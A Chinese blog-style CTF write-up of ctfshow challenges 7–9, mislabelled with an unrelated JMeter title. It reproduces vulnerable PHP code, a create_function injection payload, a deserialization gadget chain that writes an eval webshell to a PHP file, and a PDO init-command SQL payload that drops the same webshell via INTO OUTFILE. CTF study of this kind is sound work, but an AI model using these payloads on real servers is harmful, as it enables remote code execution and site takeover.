0
点赞
收藏
分享

微信扫一扫

利用Jmeter做接口测试(功能测试)全流程分析

吃面多放酱 2023-09-02 阅读 44

前言:

最近一直在搞java很少刷题,看见ctfshow的活动赶紧来复现一波~

ctfshow 红包挑战7

<?php
highlight_file(__FILE__);
error_reporting(2);
extract($_GET);
ini_set($name,$value);
system(
    "ls '".filter($_GET[1])."'"
);

function filter($cmd){
    $cmd = str_replace("'","",$cmd);
    $cmd = str_replace("\\","",$cmd);
    $cmd = str_replace("`","",$cmd);
    $cmd = str_replace("$","",$cmd);
    return $cmd;
}

代码很简单就是一个替换操作,然后一个system命令执行,变量覆盖还没想到如何利用

而且如果传参 ;则里面会显示  ls ';',所以猜测肯定是要闭合引号、或者注释字符这种

然后只能显示 ls  /这种,没法截断和注释

(flag近在眼前,我却得不到。。。)

 只能去看佬们的文章了

先查看扩展插件

?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731/

知识点:

xdebug在处理截断问题的时候,会将异常payload回显。而system刚好可以用0字节(%00或者\000)进行截断来触发异常。

(涨知识了,第一次见这种通过修改报错日志的路径,然后利用截断报错写入日志

 

 红包挑战8

<?php


highlight_file(__FILE__);
error_reporting(0);

extract($_GET);
create_function($name,base64_encode($value))();

那么肯定是考察create_function的用法,$name和value的值可控,但是value经过了base64编码,所以着重利用$name

先回忆一下create_function的作用

<?php


$action="\create_function";
$arg="){}var_dump(scandir(\"../\"));//";
$action($arg,'');
echo ($arg);

 

 

发现这篇文章的payload就能通,为啥早点没看懂。。。

JYcxk($name)

{ base64_encode($value) } 

payload就相当于

JYcxk(){}

var_dump(scandir(\"../\"));

注释掉了后面,然后直接var_dump执行

红包挑战9

已经给出了源码那就直接分析

发现index.php中的注册可以跳转到

 

有file_put_contents方法,当时想的是能否用phar反序列化然后用C绕过wakeup,但是生成的那么一堆数据直接传肯定是不行呀。

然后接着看,发现了很多关于session的操作

 1、session里面存放对象时,会自动进行序列化,存放序列化后的字符串
2、session里面拿取对象时,会自动进行反序列化,执行对象的魔术方法

session_decode($_GET)正好是序列化的操作,$data=$_SESSION['user']是反序列化的操作

看哪里调用了getLoginName,发现在index.php中不符合前面的条件就会包含main.php,

 因为在

 需要getCookie=NULL,所以需要在用户名中加一个|这样就不等于2,会返回null

 实际测试,

 

发现序列化成功修改了文件,本来想直接修改filename然后反序列化,用C代替O绕过wakeup发现是不可行的。

 思路

就是绕过wakeup不就可以自定义那个值了嘛,或者找个提前结束的东西

 这里发现了一个die,那么让它执行到die,就会不执行wakeup直接执行destruct

然后就是构造这条链子

application::__destruct -->application::log_last_user-->mysql_helper

 

<?php
class mysql_helper{
    private $db;
}
class application{
    public $debug=true;
    public $loger;
    public $mysql;
    public function __construct(){
        $this->loger = new userLogger();
        $this->mysql = new mysql_helper();
    }
}
class userLogger{

    public $username='<?php eval($_POST[1]);phpinfo();?>';
    public $password="123456";
    public $filename="2.php";
}
$a = new application();
echo serialize($a);

 

 

 

看了师傅们的第二种方法是通过PDO数据库做的

果然, 没见过的东西都有trick

 题目应该是开启了PDO扩展(common.php中的mysql_helper类),用来连接数据库。

PHP中文手册->PDO_MYSQL预定义常量。查询到一个预定义常量叫PDO::MYSQL_ATTR_INIT_COMMAND。

它的描述翻译过来是:连接MySQL服务器时执行的命令(SQL语句)。将在重新连接时自动重新执行。注意,这个常量只能在构造一个新的数据库句柄时在driver_options数组中使用。
 

很纳闷我去php 手册找的时候,找不到这个常量(很奇怪)

既然能执行sql语句,

select '<?php eval($_POST[1]);phpinfo();?>' into outfile '/var/www/html/1.php'; 

 和上面基本一样也是调用pdo,只不过不用绕过wakeup了

<?php
session_start();
class mysql_helper
{
    public $option = array(
        PDO::MYSQL_ATTR_INIT_COMMAND => "select '<?php eval(\$_POST[1]);phpinfo();?>'  into outfile '/var/www/html/1.php';"
    );
}
class application
{
    public $mysql;
    public $debug = true;

    public function __construct()
    {
        $this->mysql = new mysql_helper();
    }
}

$a = new application();
echo urlencode(serialize($a));

总结

其实这几道题都是通过php的扩展来做,还是需要多翻php文档。

 

 

举报

相关推荐

0 条评论